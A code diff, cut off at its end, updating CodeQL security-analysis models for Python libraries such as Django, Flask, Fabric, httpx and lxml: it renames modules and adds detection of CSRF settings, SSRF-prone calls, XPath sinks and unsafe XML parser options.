@@ -2172,7 +2567,7 @@ module PrivateDjango {
* See https://docs.djangoproject.com/en/1.11/ref/urls/#django.conf.urls.url
*/
private class DjangoConfUrlsUrlCall extends DjangoRegexRouteSetup, DataFlow::CallCfgNode {
DjangoConfUrlsUrlCall() { this = django::conf::conf_urls::url().getACall() }
DjangoConfUrlsUrlCall() { this = DjangoImpl::Conf::ConfUrls::url().getACall() }
override DataFlow::Node getUrlPatternArg() {
result in [this.getArg(0), this.getArgByName("regex")]
@@ -2185,7 +2580,7 @@ module PrivateDjango {
// HttpRequest taint modeling
// ---------------------------------------------------------------------------
/** A parameter that will receive the django `HttpRequest` instance when a request handler is invoked. */
private class DjangoRequestHandlerRequestParam extends django::http::request::HttpRequest::InstanceSource,
private class DjangoRequestHandlerRequestParam extends DjangoImpl::Http::Request::HttpRequest::InstanceSource,
RemoteFlowSource::Range, DataFlow::ParameterNode {
DjangoRequestHandlerRequestParam() {
this.getParameter() = any(DjangoRouteSetup setup).getARequestHandler().getRequestParam()
@@ -2202,7 +2597,7 @@ module PrivateDjango {
*
* See https://docs.djangoproject.com/en/3.1/topics/class-based-views/generic-display/#dynamic-filtering
*/
private class DjangoViewClassRequestAttributeRead extends django::http::request::HttpRequest::InstanceSource,
private class DjangoViewClassRequestAttributeRead extends DjangoImpl::Http::Request::HttpRequest::InstanceSource,
RemoteFlowSource::Range, DataFlow::Node {
DjangoViewClassRequestAttributeRead() {
exists(DataFlow::AttrRead read | this = read |
@@ -2236,6 +2631,36 @@ module PrivateDjango {
}
}
/**
* A parameter that accepts the filename used to upload a file. This is the second
* parameter in functions used for the `upload_to` argument to a `FileField`.
*
* Note that the value this parameter accepts cannot contain a slash. Even when
* forcing the filename to contain a slash when sending the request, django does
   * something like `input_filename.split("/")[-1]` (so other special characters are still
* allowed). This also means that although the return value from `upload_to` is used
* to construct a path, path injection is not possible.
*
* See
* - https://docs.djangoproject.com/en/3.1/ref/models/fields/#django.db.models.FileField.upload_to
* - https://docs.djangoproject.com/en/3.1/topics/http/file-uploads/#handling-uploaded-files-with-a-model
*/
private class DjangoFileFieldUploadToFunctionFilenameParam extends RemoteFlowSource::Range,
DataFlow::ParameterNode {
DjangoFileFieldUploadToFunctionFilenameParam() {
exists(DataFlow::CallCfgNode call, DataFlow::Node uploadToArg, Function func |
this.getParameter() = func.getArg(1) and
call = DjangoImpl::DB::Models::FileField::subclassRef().getACall() and
uploadToArg in [call.getArg(2), call.getArgByName("upload_to")] and
uploadToArg = poorMansFunctionTracker(func)
)
}
override string getSourceType() {
result = "django filename parameter to function used in FileField.upload_to"
}
}
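    // A minimal sketch of the pattern described above (names are hypothetical):
    //
    //    from django.db import models
    //
    //    def upload_path(instance, filename):   # `filename` is the remote flow source
    //        return "uploads/{}".format(filename)
    //
    //    class Document(models.Model):
    //        attachment = models.FileField(upload_to=upload_path)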
// ---------------------------------------------------------------------------
// django.shortcuts.redirect
// ---------------------------------------------------------------------------
@@ -2249,7 +2674,7 @@ module PrivateDjango {
*/
private class DjangoShortcutsRedirectCall extends HTTP::Server::HttpRedirectResponse::Range,
DataFlow::CallCfgNode {
DjangoShortcutsRedirectCall() { this = django::shortcuts::redirect().getACall() }
DjangoShortcutsRedirectCall() { this = DjangoImpl::Shortcuts::redirect().getACall() }
/**
* Gets the data-flow node that specifies the location of this HTTP redirect response.
@@ -2313,4 +2738,67 @@ module PrivateDjango {
.getAnImmediateUse()
}
}
// ---------------------------------------------------------------------------
// Settings
// ---------------------------------------------------------------------------
/**
* A custom middleware stack
*/
private class DjangoSettingsMiddlewareStack extends HTTP::Server::CsrfProtectionSetting::Range {
List list;
DjangoSettingsMiddlewareStack() {
this.asExpr() = list and
// we look for an assignment to the `MIDDLEWARE` setting
exists(DataFlow::Node mw |
mw.asVar().getName() = "MIDDLEWARE" and
DataFlow::localFlow(this, mw)
|
// To only include results where CSRF protection matters, we only care about CSRF
        // protection when the django authentication middleware is enabled, since an active
        // session cookie is exactly what would allow an attacker to perform a CSRF attack.
        // Notice that this does not guarantee the result is not a FP, since the
        // authentication middleware might be unused.
//
// This also strongly implies that `mw` is in fact a Django middleware setting and
// not just a variable named `MIDDLEWARE`.
list.getAnElt().(StrConst).getText() =
"django.contrib.auth.middleware.AuthenticationMiddleware"
)
}
override boolean getVerificationSetting() {
if
list.getAnElt().(StrConst).getText() in [
"django.middleware.csrf.CsrfViewMiddleware",
// see https://github.com/mozilla/django-session-csrf
"session_csrf.CsrfMiddleware"
]
then result = true
else result = false
}
}
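    // For example, a `settings.py` along these lines is classified as having CSRF
    // verification enabled (sketch):
    //
    //    MIDDLEWARE = [
    //        "django.contrib.auth.middleware.AuthenticationMiddleware",
    //        "django.middleware.csrf.CsrfViewMiddleware",
    //    ]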
private class DjangoCsrfDecorator extends HTTP::Server::CsrfLocalProtectionSetting::Range {
string decoratorName;
Function function;
DjangoCsrfDecorator() {
decoratorName in ["csrf_protect", "csrf_exempt", "requires_csrf_token", "ensure_csrf_cookie"] and
this =
API::moduleImport("django")
.getMember("views")
.getMember("decorators")
.getMember("csrf")
.getMember(decoratorName)
.getAUse() and
this.asExpr() = function.getADecorator()
}
override Function getRequestHandler() { result = function }
override predicate csrfEnabled() { decoratorName in ["csrf_protect", "requires_csrf_token"] }
}
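    // For example (sketch), `my_view` below has CSRF protection explicitly disabled:
    //
    //    from django.views.decorators.csrf import csrf_exempt
    //
    //    @csrf_exempt
    //    def my_view(request):
    //        ...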
}

View File

@@ -24,7 +24,7 @@ private module FabricV1 {
API::Node fabric() { result = API::moduleImport("fabric") }
/** Provides models for the `fabric` module. */
module fabric {
module Fabric {
// -------------------------------------------------------------------------
// fabric.api
// -------------------------------------------------------------------------
@@ -32,7 +32,7 @@ private module FabricV1 {
API::Node api() { result = fabric().getMember("api") }
/** Provides models for the `fabric.api` module */
module api {
module Api {
/**
* A call to either
* - `fabric.api.local`
@@ -66,7 +66,7 @@ private module FabricV2 {
API::Node fabric() { result = API::moduleImport("fabric") }
/** Provides models for the `fabric` module. */
module fabric {
module Fabric {
// -------------------------------------------------------------------------
// fabric.connection
// -------------------------------------------------------------------------
@@ -74,13 +74,13 @@ private module FabricV2 {
API::Node connection() { result = fabric().getMember("connection") }
/** Provides models for the `fabric.connection` module */
module connection {
module Connection {
/**
* Provides models for the `fabric.connection.Connection` class
*
* See https://docs.fabfile.org/en/2.5/api/connection.html#fabric.connection.Connection.
*/
module Connection {
module ConnectionClass {
/** Gets a reference to the `fabric.connection.Connection` class. */
API::Node classRef() {
result = fabric().getMember("Connection")
@@ -155,7 +155,7 @@ private module FabricV2 {
private class FabricConnectionRunSudoLocalCall extends SystemCommandExecution::Range,
DataFlow::CallCfgNode {
FabricConnectionRunSudoLocalCall() {
this.getFunction() = fabric::connection::Connection::instanceRunMethods()
this.getFunction() = Fabric::Connection::ConnectionClass::instanceRunMethods()
}
override DataFlow::Node getCommand() {
@@ -170,16 +170,16 @@ private module FabricV2 {
API::Node tasks() { result = fabric().getMember("tasks") }
/** Provides models for the `fabric.tasks` module */
module tasks {
module Tasks {
/** Gets a reference to the `fabric.tasks.task` decorator. */
API::Node task() { result in [tasks().getMember("task"), fabric().getMember("task")] }
}
class FabricTaskFirstParamConnectionInstance extends fabric::connection::Connection::InstanceSource,
class FabricTaskFirstParamConnectionInstance extends Fabric::Connection::ConnectionClass::InstanceSource,
DataFlow::ParameterNode {
FabricTaskFirstParamConnectionInstance() {
exists(Function func |
func.getADecorator() = fabric::tasks::task().getAUse().asExpr() and
func.getADecorator() = Fabric::Tasks::task().getAUse().asExpr() and
this.getParameter() = func.getArg(0)
)
}
@@ -192,7 +192,7 @@ private module FabricV2 {
API::Node group() { result = fabric().getMember("group") }
/** Provides models for the `fabric.group` module */
module group {
module Group {
/**
* Provides models for the `fabric.group.Group` class and its subclasses.
*
@@ -204,7 +204,7 @@ private module FabricV2 {
* - https://docs.fabfile.org/en/2.5/api/group.html#fabric.group.SerialGroup
* - https://docs.fabfile.org/en/2.5/api/group.html#fabric.group.ThreadingGroup
*/
module Group {
module GroupClass {
/**
             * A source of instances of a subclass of `fabric.group.Group`, extend this class to model new instances.
*
@@ -236,7 +236,9 @@ private module FabricV2 {
* See https://docs.fabfile.org/en/2.5/api/group.html#fabric.group.Group.run
*/
private class FabricGroupRunCall extends SystemCommandExecution::Range, DataFlow::CallCfgNode {
FabricGroupRunCall() { this = fabric::group::Group::subclassInstanceRunMethod().getACall() }
FabricGroupRunCall() {
this = Fabric::Group::GroupClass::subclassInstanceRunMethod().getACall()
}
override DataFlow::Node getCommand() {
result = [this.getArg(0), this.getArgByName("command")]
@@ -249,7 +251,7 @@ private module FabricV2 {
* See https://docs.fabfile.org/en/2.5/api/group.html#fabric.group.SerialGroup.
*/
module SerialGroup {
private class ClassInstantiation extends Group::ModeledSubclass {
private class ClassInstantiation extends GroupClass::ModeledSubclass {
ClassInstantiation() {
this = group().getMember("SerialGroup")
or
@@ -264,7 +266,7 @@ private module FabricV2 {
* See https://docs.fabfile.org/en/2.5/api/group.html#fabric.group.ThreadingGroup.
*/
module ThreadingGroup {
private class ClassInstantiation extends Group::ModeledSubclass {
private class ClassInstantiation extends GroupClass::ModeledSubclass {
ClassInstantiation() {
this = group().getMember("ThreadingGroup")
or

View File

@@ -30,13 +30,16 @@ private module FastApi {
*
* See https://fastapi.tiangolo.com/tutorial/bigger-applications/.
*/
module APIRouter {
/** Gets a reference to an instance of `fastapi.APIRouter`. */
module ApiRouter {
    /** Gets a reference to an instance of `fastapi.APIRouter`. */
API::Node instance() {
result = API::moduleImport("fastapi").getMember("APIRouter").getASubclass*().getReturn()
}
}
/** DEPRECATED: Alias for ApiRouter */
deprecated module APIRouter = ApiRouter;
// ---------------------------------------------------------------------------
// routing modeling
// ---------------------------------------------------------------------------
@@ -54,7 +57,7 @@ private module FastApi {
|
this = App::instance().getMember(routeAddingMethod).getACall()
or
this = APIRouter::instance().getMember(routeAddingMethod).getACall()
this = ApiRouter::instance().getMember(routeAddingMethod).getACall()
)
}
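    // A minimal sketch of the router-based routing recognized above:
    //
    //    import fastapi
    //
    //    app = fastapi.FastAPI()
    //    router = fastapi.APIRouter()
    //
    //    @router.get("/items/{item_id}")
    //    async def read_item(item_id: str):
    //        return {"item_id": item_id}
    //
    //    app.include_router(router)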

View File

@@ -122,7 +122,9 @@ module Flask {
private class ClassInstantiation extends InstanceSource, DataFlow::CallCfgNode {
ClassInstantiation() { this = classRef().getACall() }
override DataFlow::Node getBody() { result = this.getArg(0) }
override DataFlow::Node getBody() {
result in [this.getArg(0), this.getArgByName("response")]
}
override string getMimetypeDefault() { result = "text/html" }
@@ -192,8 +194,8 @@ module Flask {
API::Node api_node;
FlaskViewClass() {
this.getABase() = Views::View::subclassRef().getAUse().asExpr() and
api_node.getAnImmediateUse().asExpr().(ClassExpr) = this.getParent()
api_node = Views::View::subclassRef() and
this.getParent() = api_node.getAnImmediateUse().asExpr()
}
/** Gets a function that could handle incoming requests, if any. */
@@ -217,8 +219,8 @@ module Flask {
*/
class FlaskMethodViewClass extends FlaskViewClass {
FlaskMethodViewClass() {
this.getABase() = Views::MethodView::subclassRef().getAUse().asExpr() and
api_node.getAnImmediateUse().asExpr().(ClassExpr) = this.getParent()
api_node = Views::MethodView::subclassRef() and
this.getParent() = api_node.getAnImmediateUse().asExpr()
}
override Function getARequestHandler() {
@@ -299,7 +301,7 @@ module Flask {
override Function getARequestHandler() {
exists(DataFlow::LocalSourceNode func_src |
func_src.flowsTo(this.getViewArg()) and
func_src.asExpr().(CallableExpr) = result.getDefinition()
func_src.asExpr() = result.getDefinition()
)
or
exists(FlaskViewClass vc |
@@ -401,47 +403,37 @@ module Flask {
}
private class RequestAttrMultiDict extends Werkzeug::MultiDict::InstanceSource {
string attr_name;
RequestAttrMultiDict() {
attr_name in ["args", "values", "form", "files"] and
this.(DataFlow::AttrRead).accesses(request().getAUse(), attr_name)
this = request().getMember(["args", "values", "form", "files"]).getAnImmediateUse()
}
}
/** An `FileStorage` instance that originates from a flask request. */
private class FlaskRequestFileStorageInstances extends Werkzeug::FileStorage::InstanceSource {
FlaskRequestFileStorageInstances() {
// TODO: this currently only works in local-scope, since writing type-trackers for
// this is a little too much effort. Once API-graphs are available for more
// things, we can rewrite this.
//
// TODO: This approach for identifying member-access is very adhoc, and we should
// be able to do something more structured for providing modeling of the members
// of a container-object.
exists(DataFlow::AttrRead files | files.accesses(request().getAUse(), "files") |
this.asCfgNode().(SubscriptNode).getObject() = files.asCfgNode()
exists(API::Node files | files = request().getMember("files") |
this.asCfgNode().(SubscriptNode).getObject() = files.getAUse().asCfgNode()
or
this.(DataFlow::MethodCallNode).calls(files, "get")
this = files.getMember("get").getACall()
or
exists(DataFlow::MethodCallNode getlistCall | getlistCall.calls(files, "getlist") |
this.asCfgNode().(SubscriptNode).getObject() = getlistCall.asCfgNode()
)
this.asCfgNode().(SubscriptNode).getObject() =
files.getMember("getlist").getReturn().getAUse().asCfgNode()
)
}
}
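    // The recognized access patterns, roughly (sketch):
    //
    //    from flask import request
    //
    //    f = request.files["upload"]              # subscript
    //    f = request.files.get("upload")          # .get(...)
    //    f = request.files.getlist("upload")[0]   # element of .getlist(...)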
/** An `Headers` instance that originates from a flask request. */
private class FlaskRequestHeadersInstances extends Werkzeug::Headers::InstanceSource {
FlaskRequestHeadersInstances() {
this.(DataFlow::AttrRead).accesses(request().getAUse(), "headers")
}
FlaskRequestHeadersInstances() { this = request().getMember("headers").getAnImmediateUse() }
}
/** An `Authorization` instance that originates from a flask request. */
private class FlaskRequestAuthorizationInstances extends Werkzeug::Authorization::InstanceSource {
FlaskRequestAuthorizationInstances() {
this.(DataFlow::AttrRead).accesses(request().getAUse(), "authorization")
this = request().getMember("authorization").getAnImmediateUse()
}
}

View File

@@ -35,7 +35,7 @@ private module FlaskSqlAlchemy {
/** Access on a DB resulting in an Engine */
private class DbEngine extends SqlAlchemy::Engine::InstanceSource {
DbEngine() {
this = dbInstance().getMember("engine").getAUse()
this = dbInstance().getMember("engine").getAnImmediateUse()
or
this = dbInstance().getMember("get_engine").getACall()
}
@@ -44,7 +44,7 @@ private module FlaskSqlAlchemy {
/** Access on a DB resulting in a Session */
private class DbSession extends SqlAlchemy::Session::InstanceSource {
DbSession() {
this = dbInstance().getMember("session").getAUse()
this = dbInstance().getMember("session").getAnImmediateUse()
or
this = dbInstance().getMember("create_session").getReturn().getACall()
or

View File

@@ -0,0 +1,88 @@
/**
* Provides classes modeling security-relevant aspects of the `httpx` PyPI package.
*
* See
* - https://pypi.org/project/httpx/
* - https://www.python-httpx.org/
*/
private import python
private import semmle.python.Concepts
private import semmle.python.ApiGraphs
/**
* Provides models for the `httpx` PyPI package.
*
* See
* - https://pypi.org/project/httpx/
* - https://www.python-httpx.org/
*/
private module HttpxModel {
private class RequestCall extends HTTP::Client::Request::Range, DataFlow::CallCfgNode {
string methodName;
RequestCall() {
methodName in [HTTP::httpVerbLower(), "request", "stream"] and
this = API::moduleImport("httpx").getMember(methodName).getACall()
}
override DataFlow::Node getAUrlPart() {
result = this.getArgByName("url")
or
if methodName in ["request", "stream"]
then result = this.getArg(1)
else result = this.getArg(0)
}
override string getFramework() { result = "httpx" }
override predicate disablesCertificateValidation(
DataFlow::Node disablingNode, DataFlow::Node argumentOrigin
) {
// TODO: Look into disabling certificate validation
none()
}
}
/**
* Provides models for the `httpx.[Async]Client` class
*
* See https://www.python-httpx.org/async/
*/
module Client {
    /** Gets a reference to the `httpx.Client` or `httpx.AsyncClient` class. */
private API::Node classRef() {
result = API::moduleImport("httpx").getMember(["Client", "AsyncClient"])
}
    /** Gets a reference to an `httpx.Client` or `httpx.AsyncClient` instance. */
private API::Node instance() { result = classRef().getReturn() }
/** A method call on a Client that sends off a request */
private class OutgoingRequestCall extends HTTP::Client::Request::Range, DataFlow::CallCfgNode {
string methodName;
OutgoingRequestCall() {
methodName in [HTTP::httpVerbLower(), "request", "stream"] and
this = instance().getMember(methodName).getACall()
}
override DataFlow::Node getAUrlPart() {
result = this.getArgByName("url")
or
if methodName in ["request", "stream"]
then result = this.getArg(1)
else result = this.getArg(0)
}
override string getFramework() { result = "httpx.[Async]Client" }
override predicate disablesCertificateValidation(
DataFlow::Node disablingNode, DataFlow::Node argumentOrigin
) {
// TODO: Look into disabling certificate validation
none()
}
}
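    // A minimal usage sketch of the calls recognized above:
    //
    //    import httpx
    //
    //    url = "https://example.com"
    //    httpx.get(url)               # module-level request
    //    client = httpx.Client()
    //    client.request("GET", url)   # URL is the second positional argument
    //    with client.stream("GET", url) as response:
    //        pass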
}
}

View File

@@ -20,14 +20,11 @@ private module Invoke {
API::Node invoke() { result = API::moduleImport("invoke") }
/** Provides models for the `invoke` module. */
module invoke {
/** Gets a reference to the `invoke.context` module. */
API::Node context() { result = invoke().getMember("context") }
module InvokeModule {
/** Provides models for the `invoke.context` module */
module context {
module Context {
/** Provides models for the `invoke.context.Context` class */
module Context {
module ContextClass {
/** Gets a reference to the `invoke.context.Context` class. */
API::Node classRef() {
result = API::moduleImport("invoke").getMember("context").getMember("Context")
@@ -39,7 +36,7 @@ private module Invoke {
private DataFlow::TypeTrackingNode instance(DataFlow::TypeTracker t) {
t.start() and
(
result = invoke::context::Context::classRef().getACall()
result = InvokeModule::Context::ContextClass::classRef().getACall()
or
exists(Function func |
func.getADecorator() = invoke().getMember("task").getAUse().asExpr() and
@@ -56,7 +53,7 @@ private module Invoke {
/** Gets a reference to the `run` or `sudo` methods on a `invoke.context.Context` instance. */
private DataFlow::TypeTrackingNode instanceRunMethods(DataFlow::TypeTracker t) {
t.startInAttr(["run", "sudo"]) and
result = invoke::context::Context::instance()
result = InvokeModule::Context::ContextClass::instance()
or
exists(DataFlow::TypeTracker t2 | result = instanceRunMethods(t2).track(t2, t))
}
@@ -77,7 +74,7 @@ private module Invoke {
private class InvokeRunCommandCall extends SystemCommandExecution::Range, DataFlow::CallCfgNode {
InvokeRunCommandCall() {
this = invoke().getMember(["run", "sudo"]).getACall() or
this.getFunction() = invoke::context::Context::instanceRunMethods()
this.getFunction() = InvokeModule::Context::ContextClass::instanceRunMethods()
}
override DataFlow::Node getCommand() {

View File

@@ -0,0 +1,42 @@
/**
* Provides classes modeling security-relevant aspects of the `libtaxii` PyPI package.
*
* See
* - https://pypi.org/project/libtaxii/
* - https://github.com/TAXIIProject/libtaxii
*/
private import python
private import semmle.python.Concepts
private import semmle.python.ApiGraphs
/**
* Provides models for the `libtaxii` PyPI package.
*
* See
* - https://pypi.org/project/libtaxii/
* - https://github.com/TAXIIProject/libtaxii
*/
private module Libtaxii {
/**
* A call to `libtaxii.common.parse`.
   * When the `allow_url` parameter is set to `True`, there is an SSRF vulnerability.
*/
private class ParseCall extends HTTP::Client::Request::Range, DataFlow::CallCfgNode {
ParseCall() {
this = API::moduleImport("libtaxii").getMember("common").getMember("parse").getACall() and
this.getArgByName("allow_url").getALocalSource().asExpr() = any(True t)
}
override DataFlow::Node getAUrlPart() { result in [this.getArg(0), this.getArgByName("s")] }
override string getFramework() { result = "libtaxii.common.parse" }
override predicate disablesCertificateValidation(
DataFlow::Node disablingNode, DataFlow::Node argumentOrigin
) {
// TODO: Look into disabling certificate validation
none()
}
}
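  // A minimal sketch of the call matched above (as modeled here, the first argument
  // `s` may be a URL that the library fetches when `allow_url=True`):
  //
  //    import libtaxii.common
  //
  //    doc = libtaxii.common.parse(user_controlled, allow_url=True)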
}

View File

@@ -0,0 +1,45 @@
/**
* Provides classes modeling security-relevant aspects of the `libxml2` PyPI package.
*
* See
* - https://pypi.org/project/libxml2-python3/
* - http://xmlsoft.org/python.html
*/
private import python
private import semmle.python.dataflow.new.DataFlow
private import semmle.python.Concepts
private import semmle.python.ApiGraphs
/**
* Provides classes modeling security-relevant aspects of the `libxml2` PyPI package
*
* See
* - https://pypi.org/project/libxml2-python3/
* - http://xmlsoft.org/python.html
*/
private module Libxml2 {
/**
* A call to the `xpathEval` method of a parsed document.
*
* import libxml2
* tree = libxml2.parseFile("file.xml")
* r = tree.xpathEval('`sink`')
*
* See http://xmlsoft.org/python.html
*/
class XpathEvalCall extends XML::XPathExecution::Range, DataFlow::CallCfgNode {
XpathEvalCall() {
this =
API::moduleImport("libxml2")
.getMember("parseFile")
.getReturn()
.getMember("xpathEval")
.getACall()
}
override DataFlow::Node getXPath() { result = this.getArg(0) }
override string getName() { result = "libxml2" }
}
}

View File

@@ -0,0 +1,334 @@
/**
* Provides classes modeling security-relevant aspects of the `lxml` PyPI package.
*
* See
* - https://pypi.org/project/lxml/
* - https://lxml.de/tutorial.html
*/
private import python
private import semmle.python.dataflow.new.DataFlow
private import semmle.python.Concepts
private import semmle.python.ApiGraphs
/**
* Provides classes modeling security-relevant aspects of the `lxml` PyPI package
*
* See
* - https://pypi.org/project/lxml/
* - https://lxml.de/tutorial.html
*/
private module Lxml {
// ---------------------------------------------------------------------------
// XPath
// ---------------------------------------------------------------------------
/**
* A class constructor compiling an XPath expression.
*
* from lxml import etree
* find_text = etree.XPath("`sink`")
* find_text = etree.ETXPath("`sink`")
*
* See
* - https://lxml.de/apidoc/lxml.etree.html#lxml.etree.XPath
* - https://lxml.de/apidoc/lxml.etree.html#lxml.etree.ETXPath
*/
private class XPathClassCall extends XML::XPathConstruction::Range, DataFlow::CallCfgNode {
XPathClassCall() {
this = API::moduleImport("lxml").getMember("etree").getMember(["XPath", "ETXPath"]).getACall()
}
override DataFlow::Node getXPath() { result in [this.getArg(0), this.getArgByName("path")] }
override string getName() { result = "lxml.etree" }
}
/**
* A call to the `xpath` method of a parsed document.
*
* from lxml import etree
* root = etree.fromstring(file(XML_DB).read(), XMLParser())
* find_text = root.xpath("`sink`")
*
* See https://lxml.de/apidoc/lxml.etree.html#lxml.etree._ElementTree.xpath
* as well as
* - https://lxml.de/apidoc/lxml.etree.html#lxml.etree.parse
* - https://lxml.de/apidoc/lxml.etree.html#lxml.etree.fromstring
* - https://lxml.de/apidoc/lxml.etree.html#lxml.etree.fromstringlist
* - https://lxml.de/apidoc/lxml.etree.html#lxml.etree.HTML
* - https://lxml.de/apidoc/lxml.etree.html#lxml.etree.XML
*/
class XPathCall extends XML::XPathExecution::Range, DataFlow::CallCfgNode {
XPathCall() {
exists(API::Node parseResult |
parseResult =
API::moduleImport("lxml")
.getMember("etree")
.getMember(["parse", "fromstring", "fromstringlist", "HTML", "XML"])
.getReturn()
or
// TODO: lxml.etree.parseid(<text>)[0] will contain the root element from parsing <text>
// but we don't really have a way to model that nicely.
parseResult =
API::moduleImport("lxml")
.getMember("etree")
.getMember("XMLParser")
.getReturn()
.getMember("close")
.getReturn()
|
this = parseResult.getMember("xpath").getACall()
)
}
override DataFlow::Node getXPath() { result in [this.getArg(0), this.getArgByName("_path")] }
override string getName() { result = "lxml.etree" }
}
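  /**
   * A call to an XPath evaluator created with `lxml.etree.XPathEvaluator`,
   * for example (sketch):
   *
   *    from lxml import etree
   *    root = etree.fromstring(xml_text)
   *    find = etree.XPathEvaluator(root)
   *    result = find("`sink`")
   *
   * See https://lxml.de/apidoc/lxml.etree.html#lxml.etree.XPathEvaluator
   */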
class XPathEvaluatorCall extends XML::XPathExecution::Range, DataFlow::CallCfgNode {
XPathEvaluatorCall() {
this =
API::moduleImport("lxml")
.getMember("etree")
.getMember("XPathEvaluator")
.getReturn()
.getACall()
}
override DataFlow::Node getXPath() { result = this.getArg(0) }
override string getName() { result = "lxml.etree" }
}
// ---------------------------------------------------------------------------
// Parsing
// ---------------------------------------------------------------------------
/**
* Provides models for `lxml.etree` parsers.
*
* See https://lxml.de/apidoc/lxml.etree.html?highlight=xmlparser#lxml.etree.XMLParser
*/
module XmlParser {
/**
* A source of instances of `lxml.etree` parsers, extend this class to model new instances.
*
* This can include instantiations of the class, return values from function
* calls, or a special parameter that will be set when functions are called by an external
* library.
*
* Use the predicate `XmlParser::instance()` to get references to instances of `lxml.etree` parsers.
*/
abstract class InstanceSource extends DataFlow::LocalSourceNode {
/** Holds if this instance is vulnerable to `kind`. */
abstract predicate vulnerableTo(XML::XmlParsingVulnerabilityKind kind);
}
/**
* A call to `lxml.etree.XMLParser`.
*
* See https://lxml.de/apidoc/lxml.etree.html?highlight=xmlparser#lxml.etree.XMLParser
*/
private class LxmlParser extends InstanceSource, API::CallNode {
LxmlParser() {
this = API::moduleImport("lxml").getMember("etree").getMember("XMLParser").getACall()
}
// NOTE: it's not possible to change settings of a parser after constructing it
override predicate vulnerableTo(XML::XmlParsingVulnerabilityKind kind) {
kind.isXxe() and
(
// resolve_entities defaults to True
not exists(this.getArgByName("resolve_entities"))
or
this.getKeywordParameter("resolve_entities").getAValueReachingRhs().asExpr() = any(True t)
)
or
kind.isXmlBomb() and
this.getKeywordParameter("huge_tree").getAValueReachingRhs().asExpr() = any(True t) and
not this.getKeywordParameter("resolve_entities").getAValueReachingRhs().asExpr() =
any(False t)
or
kind.isDtdRetrieval() and
this.getKeywordParameter("load_dtd").getAValueReachingRhs().asExpr() = any(True t) and
this.getKeywordParameter("no_network").getAValueReachingRhs().asExpr() = any(False t)
}
}
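
To illustrate which `XMLParser` configurations the model above treats as vulnerable (a sketch; the input is a stand-in for attacker-controlled XML):

from lxml import etree

untrusted_xml = b"<doc/>"  # stand-in for attacker-controlled input

xxe_parser = etree.XMLParser()                                 # resolve_entities defaults to True, so XXE
safe_parser = etree.XMLParser(resolve_entities=False)          # not flagged for XXE
bomb_parser = etree.XMLParser(huge_tree=True)                  # lifts libxml2's expansion limits, so XML bomb
dtd_parser = etree.XMLParser(load_dtd=True, no_network=False)  # may fetch remote DTDs, so DTD retrieval

root = etree.fromstring(untrusted_xml, xxe_parser)
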
/**
* A call to `lxml.etree.get_default_parser`.
*
* See https://lxml.de/apidoc/lxml.etree.html?highlight=xmlparser#lxml.etree.get_default_parser
*/
private class LxmlDefaultParser extends InstanceSource, DataFlow::CallCfgNode {
LxmlDefaultParser() {
this =
API::moduleImport("lxml").getMember("etree").getMember("get_default_parser").getACall()
}
override predicate vulnerableTo(XML::XmlParsingVulnerabilityKind kind) {
// as highlighted by
// https://lxml.de/apidoc/lxml.etree.html?highlight=xmlparser#lxml.etree.XMLParser
// by default XXE is allowed, so as long as the default parser has not been
// overridden, the result is also vulnerable to XXE.
kind.isXxe()
// TODO: take into account that you can override the default parser with `lxml.etree.set_default_parser`.
}
}
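
A sketch of the default-parser case: `get_default_parser()` returns a parser with entity resolution enabled, unless `set_default_parser` has replaced it (the input is illustrative):

from lxml import etree

parser = etree.get_default_parser()
root = etree.fromstring(b"<doc/>", parser)  # b"<doc/>" stands in for untrusted input; XXE-prone by default
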
/** Gets a reference to an `lxml.etree` parser instance, with origin `origin`. */
private DataFlow::TypeTrackingNode instance(DataFlow::TypeTracker t, InstanceSource origin) {
t.start() and
result = origin
or
exists(DataFlow::TypeTracker t2 | result = instance(t2, origin).track(t2, t))
}
/** Gets a reference to an `lxml.etree` parser instance, with origin `origin`. */
DataFlow::Node instance(InstanceSource origin) {
instance(DataFlow::TypeTracker::end(), origin).flowsTo(result)
}
/** Gets a reference to an `lxml.etree` parser instance that is vulnerable to `kind`. */
DataFlow::Node instanceVulnerableTo(XML::XmlParsingVulnerabilityKind kind) {
exists(InstanceSource origin | result = instance(origin) and origin.vulnerableTo(kind))
}
/**
* A call to the `feed` method of an `lxml` parser.
*/
private class LxmlParserFeedCall extends DataFlow::MethodCallNode, XML::XmlParsing::Range {
LxmlParserFeedCall() { this.calls(instance(_), "feed") }
override DataFlow::Node getAnInput() { result in [this.getArg(0), this.getArgByName("data")] }
override predicate vulnerableTo(XML::XmlParsingVulnerabilityKind kind) {
this.calls(instanceVulnerableTo(kind), "feed")
}
override predicate mayExecuteInput() { none() }
override DataFlow::Node getOutput() {
exists(DataFlow::Node objRef |
DataFlow::localFlow(this.getObject(), objRef) and
result.(DataFlow::MethodCallNode).calls(objRef, "close")
)
}
}
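
The incremental feed/close pattern modeled by `LxmlParserFeedCall`, sketched with illustrative data:

from lxml import etree

parser = etree.XMLParser()    # resolve_entities defaults to True
parser.feed(b"<doc>")         # getAnInput(): data fed to the parser
parser.feed(b"hello</doc>")
root = parser.close()         # getOutput(): the close() call on the same parser
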
}
/**
* A call to either of:
* - `lxml.etree.fromstring`
* - `lxml.etree.fromstringlist`
* - `lxml.etree.XML`
* - `lxml.etree.XMLID`
* - `lxml.etree.parse`
* - `lxml.etree.parseid`
*
* See
* - https://lxml.de/apidoc/lxml.etree.html?highlight=parseids#lxml.etree.fromstring
* - https://lxml.de/apidoc/lxml.etree.html?highlight=parseids#lxml.etree.fromstringlist
* - https://lxml.de/apidoc/lxml.etree.html?highlight=parseids#lxml.etree.XML
* - https://lxml.de/apidoc/lxml.etree.html?highlight=parseids#lxml.etree.XMLID
* - https://lxml.de/apidoc/lxml.etree.html?highlight=parseids#lxml.etree.parse
* - https://lxml.de/apidoc/lxml.etree.html?highlight=parseids#lxml.etree.parseid
*/
private class LxmlParsing extends DataFlow::CallCfgNode, XML::XmlParsing::Range {
string functionName;
LxmlParsing() {
functionName in ["fromstring", "fromstringlist", "XML", "XMLID", "parse", "parseid"] and
this = API::moduleImport("lxml").getMember("etree").getMember(functionName).getACall()
}
override DataFlow::Node getAnInput() {
result in [
this.getArg(0),
// fromstring / XML / XMLID
this.getArgByName("text"),
// fromstringlist
this.getArgByName("strings"),
// parse / parseid
this.getArgByName("source"),
]
}
DataFlow::Node getParserArg() { result in [this.getArg(1), this.getArgByName("parser")] }
override predicate vulnerableTo(XML::XmlParsingVulnerabilityKind kind) {
this.getParserArg() = XmlParser::instanceVulnerableTo(kind)
or
kind.isXxe() and
not exists(this.getParserArg())
}
override predicate mayExecuteInput() { none() }
override DataFlow::Node getOutput() {
